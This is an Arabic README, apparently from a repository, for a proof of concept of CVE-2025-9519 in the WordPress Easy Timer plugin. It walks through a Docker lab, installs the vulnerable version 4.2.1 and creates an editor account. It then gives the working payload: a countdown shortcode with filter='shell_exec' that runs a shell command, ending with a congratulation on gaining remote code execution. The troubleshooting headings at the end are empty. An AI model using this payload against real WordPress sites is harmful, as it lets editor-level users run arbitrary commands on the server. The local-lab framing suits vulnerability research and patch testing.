
إثبات مفهوم لاستغلال CVE-2025-9519، يوضح تنفيذ الأكواد عن بُعد في إضافة Easy Timer الخاصة بووردبريس عبر مُرشِّح shortcode مُصمَّم خصيصًا، مع إعداد قائم على Docker.
راجع الوثائق الرسمية لـ Docker للتثبيت: Docker Engine Install
من مجلد مشروعك:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/WordPress Dashboard ← Plugins ← وانقر على .
Easy TimerActivate
من مجلد مشروعك نفّذ الأمر التالي:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(ملاحظة: استبدل باسم المستخدم والبريد الإلكتروني وكلمة المرور التي تختارها!)
Posts ← Add NewShortcode block وأدخل:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ ملاحظة: تأكد من استخدام Shortcode block وليس Paragraph block، حتى يتم عرض الـ shortcode بشكل صحيح.

مبروك، لقد حصلت على RCE.

sudo docker ps
يجب أن ترى شيئًا مثل:

إذا كانت الـ shortcodes لا تُعرض:
إذا كان الانتقال إلى http://localhost:8000/ يعرض Database Not Connected: